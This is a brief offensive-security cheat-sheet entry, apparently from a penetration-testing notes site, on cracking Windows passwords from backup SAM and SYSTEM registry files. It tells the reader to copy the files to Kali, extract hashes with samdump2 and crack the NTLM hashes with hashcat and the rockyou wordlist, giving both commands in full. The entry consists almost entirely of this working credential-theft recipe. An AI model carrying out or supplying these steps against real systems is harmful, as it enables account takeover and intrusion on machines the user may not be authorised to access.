Have access to backup SAM & SYSTEM files?

  • Windows: If you have access to backup SAM & SYSTEM files, you should download them to kali and crack them with samdump2 and crack the NTLM hashes with hashcat.

samdump2 SYSTEM.OLD SAM.OLD > hashes.txt 
hashcat -m 1000 hashes.txt ~/rockyou.txt

Last updated